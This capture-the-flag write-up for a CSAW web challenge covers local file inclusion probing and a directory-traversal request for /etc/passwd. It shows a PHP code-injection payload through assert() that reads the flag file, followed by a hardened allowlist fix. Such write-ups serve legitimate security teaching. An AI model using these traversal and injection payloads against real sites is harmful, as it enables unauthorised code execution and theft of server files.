Description:
Hey, I made my first website today. It’s pretty cool and web7.9.
http://web.chal.csaw.io:8000/
Entering the site, the first thing that comes to mind is a LFI attack. The site is including a page which is requested in the URL.
The following table lists the pages the site can be asked to respond with (the last entry is a directory-traversal probe):

| URL |
| --- |
| http://web.chal.csaw.io:8000/?page=home |
| http://web.chal.csaw.io:8000/?page=about |
| http://web.chal.csaw.io:8000/?page=contact |
| http://web.chal.csaw.io:8000/?page=Megabeets |
| http://web.chal.csaw.io:8000/?page=flag |
| http://web.chal.csaw.io:8000/?page=../../../../etc/passwd |
Looking at the source code I saw the following comment:

```html
<!--<li ><a href="?page=flag">My secrets</a></li> -->
```
Ok, I need to get the "flag" page, but none of the LFI techniques I tried worked. I thought of something else: in the "about" page the creator of the site mentions that it was built using git. So let's see if I can download the repository. The page http://web.chal.csaw.io:8000/.git/config exists, so I downloaded the repository using DVCS-RIPPER.
You can find index.php here.
So the page calls assert() on a string that contains the user-supplied page name; PHP evaluates that string as code, which makes it vulnerable to an injection attack. After a little trial and error I came up with the answer:
```powershell
(Invoke-WebRequest "http://web.chal.csaw.io:8000/?page=Megabeets') || var_dump(file_get_contents('templates/flag.php'));// Comment").Content
```
And received the flag:

```
string(52) "<?php $FLAG="flag{3vald_@ss3rt_1s_best_a$$ert}"; ?>
"
Detected hacking attempt!
```
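To make the root cause concrete, here is an added example (my own code, not the challenge's index.php, which is only linked above) showing the assert()-on-a-string pattern that makes a page include injectable, beside a hardened version that resolves the page name through a fixed allowlist. The file layout (`templates/<page>.php`) and the function names are assumptions.

```php
<?php
// Added example, not the challenge's code. Assumes pages live in templates/<name>.php.

// VULNERABLE pattern: the "no traversal" check is built by string interpolation
// and handed to assert(). With assertions enabled, PHP 5.x and 7.x evaluate a
// string argument as PHP code (deprecated in 7.2, removed in 8.0). A single
// quote in $page closes the literal and the rest of the value runs as code,
// which is exactly what the payload above does.
function include_page_vulnerable(string $page): void
{
    // Intended: reject "..". Actual: evaluates attacker-controlled code.
    assert("strpos('$page', '..') === false") or die('Detected hacking attempt!');
    include "templates/$page.php";
}

// HARDENED version: no string evaluation at all. The page name is matched
// against a fixed allowlist with strict comparison, so neither traversal nor
// injection is possible, and anything not listed (such as "flag") is rejected.
const ALLOWED_PAGES = ['home', 'about', 'contact', 'Megabeets'];

function resolve_page(string $page): ?string
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;                              // unknown page: nothing to include
    }
    return __DIR__ . '/templates/' . $page . '.php';
}

function include_page_hardened(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    include $path;
}

include_page_hardened($_GET['page'] ?? 'home');
```

The second half of the fix is independent of the PHP: the repository only became readable because `/.git/` was served by the web server, so deny that path (or keep the checkout outside the document root) regardless of how the include is written.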
If you try entering [the url][2] in a browser, look in the source of the page (CTRL+U), the flag is commented.
[2]: http://web.chal.csaw.io:8000/?page=Megabeets') || var_dump(file_get_contents('templates/flag.php'));// Comment the rest of the line
Eat Veggies